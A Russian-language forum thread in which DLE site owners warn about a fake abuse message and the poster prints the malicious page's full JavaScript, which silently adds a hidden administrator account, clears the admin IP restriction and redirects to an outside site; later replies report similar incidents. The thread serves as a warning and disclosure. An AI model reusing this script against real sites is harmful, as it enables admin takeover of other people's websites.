Скрыть объявление
ВАШИ ПРАВА ОГРАНИЧЕНЫ!

Зарегистрируйтесь на форуме, чтобы стать полноценным участником сообщества!

Персональное сообщение от madam.abuse

Тема в разделе "Свободное общение", создана пользователем byroot, 26 сен 2017.

26.09.17 в 12:05
13.02.18 в 13:29
8
2.250
0
  1. TopicStarter Overlay
    byroot

    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.295
    Лучших ответов:
    54
    Рейтинги:
    +5.206 / 74 / -0
    На один из сайтов, который я очень редко проверяю, 16 сентября пришло письмо, отправитель - пользователь "madam.abuse" :D

    Текст письма:
    При переходе по ссылке видим:
    Исходный код страницы с редиректом:
    HTML:
    Link Redirect:<br /><br />Please click <a href="&quot;&gt;&lt;/a&gt;
    
    &lt;code style=&#039;display: none;&#039; id=&#039;LJKwqoiDHqewE&#039;&gt;&lt;/code&gt;
    &lt;script&gt;
    function A(){
    var q;
    try{q=new ActiveXObject(&quot;Msxml2.XMLHTTP&quot;);}catch(e){try{q = new ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);}catch (E){
    q = false;}}if(!q && typeof XMLHttpRequest!=&#039;undefined&#039;){q = new XMLHttpRequest();}return q;
    }
    var rp=&quot;/&quot;;
    var ul=&quot;popovamariyammm&quot;;
    var up=&quot;d1478963D&quot;;
    var um=&quot;[email protected]&quot;;
    var objhttp=A();
    objhttp.onreadystatechange = function()
    {
        if (objhttp.readyState == 4)
        {
            var r=new RegExp(atob(&#039;ZGxlX2FkbWluXHMqPVxzKignfCIpKC4rPykoJ3wiKQ==&#039;));
            var da=r.exec(objhttp.responseText)[2];
            r=new RegExp(atob(&#039;ZGxlX2xvZ2luX2hhc2hccyo9XHMqKCd8IikoLis/KSgnfCIp&#039;));
            var dh=r.exec(objhttp.responseText)[2];
            objhttp.open(&quot;POST&quot;,rp+da+&#039;?mod=editusers&action=list&#039;,true);
            objhttp.setRequestHeader(&#039;Content-Type&#039;,&#039;application/x-www-form-urlencoded&#039;);
            objhttp.send(&#039;action=adduser&user_hash=&#039;+dh+&#039;&mod=editusers&regusername=&#039;+ul+&#039;&regpassword=&#039;+up+&#039;&regemail=&#039;+um+&#039;&reglevel=1&#039;);
            var objhttp2=A();
            objhttp2.onreadystatechange=function()
            {
                if(objhttp2.readyState==4)
                {
                    var sd=document.getElementById(&#039;LJKwqoiDHqewE&#039;);
                    sd.innerHTML=objhttp2.responseText.replace(/(&lt;script)/i,&#039;&#039;);
                    var ael=sd.getElementsByTagName(&#039;*&#039;);
                    var pd=&#039;&#039;;
                    r=new RegExp(atob(&#039;XihzYXZlX2Nvbik=&#039;));
                    for(var i=0;i&lt;ael.length;i++)
                        if(r.test(ael[i].name))
                            pd=pd+ael[i].name+&#039;=&#039;+encodeURIComponent(ael[i].value)+&#039;&&#039;;
                    pd=pd+&#039;save_con[admin_allowed_ip]=&mod=options&action=dosavesyscon&user_hash=&#039;+dh;
                    var objhttp3=A();
                    objhttp3.open(&#039;POST&#039;,rp+da+&#039;?mod=options&action=syscon&#039;,true);
                    objhttp3.setRequestHeader(&#039;Content-Type&#039;,&#039;application/x-www-form-urlencoded&#039;);
                    objhttp3.send(pd);
                    window.location.href = &quot;https://dle-news.org/qx6t1c&quot;;
                }
            }
            objhttp2.open(&#039;GET&#039;,rp+da+&#039;?mod=options&action=syscon&#039;,true);
            objhttp2.send(null);
        }
    
    }
    objhttp.open(&#039;GET&#039;, rp, true);
    objhttp.send(null);
    &lt;/script&gt;&lt;a href=&quot;https://dle-news.org/qx6t1c">here.</a>
    Возможно подобным кодом получают доступ к админке сайта и заливают шеллы на сайт...

    Будьте внимательны, и никогда не переходите по подобным ссылкам, всегда смотрите на href в ссылке, чтобы не выполнять подобные срипты на сайте. Так же своевременно устанавливайте все баг-фиксы ДЛЕ, и по возможности обновляйте ДЛЕ на актуальную версию!
     
    • Полезно Полезно x 3
  2. DLEPlugins

    Кодер

    Регистрация:
    29 ноя 2015
    Сообщения:
    1.608
    Лучших ответов:
    8
    Рейтинги:
    +1.195 / 9 / -0
    всем кто прочтет эту тему после моего сообщения. Если вам написали не РКН, не просто игнорьте абузу, даже не думайте переходить по ссылкам в ней. Любая информация описанная там, это угрозы, а ссылки в письме, с адресом не сайт.ру/zakon.html а сайт.ру/idi_suda.js_ya_gotov_natyanyt_tvoi_sait_i_tebya.html_vo_vse_diri.js тем более перекрещиваемся, пишем в ответ "fak you spilberg (c) Comedy Club"
     
  3. Defoz

    PRO Users

    Регистрация:
    10 апр 2016
    Сообщения:
    1.839
    Лучших ответов:
    4
    Рейтинги:
    +257 / 57 / -0
    DomiTori fak пишется не так :D
     
  4. DLEPlugins

    Кодер

    Регистрация:
    29 ноя 2015
    Сообщения:
    1.608
    Лучших ответов:
    8
    Рейтинги:
    +1.195 / 9 / -0
    цензура же
     
    • Нравится Нравится x 1
  5. wawe

    PRO Users

    Регистрация:
    23 янв 2017
    Сообщения:
    3.555
    Лучших ответов:
    6
    Рейтинги:
    +1.579 / 410 / -0
    Появился друже на одном из сайтов :D
     

    Вложения:

    • Screenshot.png
      Screenshot.png
      Размер файла:
      12,1 КБ
      Просмотров:
      80
  6. ettochno

    PRO Users

    Регистрация:
    2 авг 2016
    Сообщения:
    370
    Лучших ответов:
    1
    Рейтинги:
    +95 / 17 / -0
    Решил проверить - тоже такой есть паразит ;) сегодня заходил
    Screenshot_4.png
     
  7. DLEPlugins

    Кодер

    Регистрация:
    29 ноя 2015
    Сообщения:
    1.608
    Лучших ответов:
    8
    Рейтинги:
    +1.195 / 9 / -0
    Прилетает такое письмо
    Screenshot_18.jpg
    Перехожу на сайт который в самом низу указан
    Screenshot_19.jpg
    вспоминаю про обсуждение этой темы тут, пишу ответ на почту
    Screenshot_20.jpg
     
    • Нравится Нравится x 2
    • Смешно Смешно x 1
    • Лучший Лучший x 1
  8. olegaby

    PRO Users

    Регистрация:
    28 окт 2015
    Сообщения:
    975
    Лучших ответов:
    4
    Рейтинги:
    +257 / 80 / -0
  9. Burial

    Burial Местный

    Регистрация:
    30 сен 2015
    Сообщения:
    1.996
    Лучших ответов:
    2
    Рейтинги:
    +464 / 80 / -0
    Мне тоже сегодня пришло на один сайт.
    IP 178.132.0.65
    Ник: manasta
    Почта: [email protected]
    Работает скриптом наверно каким то, ибо сайт: городская недвижимость и только в разработке.
     
Похожие темы
  1. redissx
    Ответов:
    9
    Просмотров:
    3.807
  2. sergo
    Ответов:
    0
    Просмотров:
    1.144
  3. Roman.U
    Ответов:
    25
    Просмотров:
    2.787
  4. Frosty
    Ответов:
    4
    Просмотров:
    1.643
Загрузка...
Яндекс.Метрика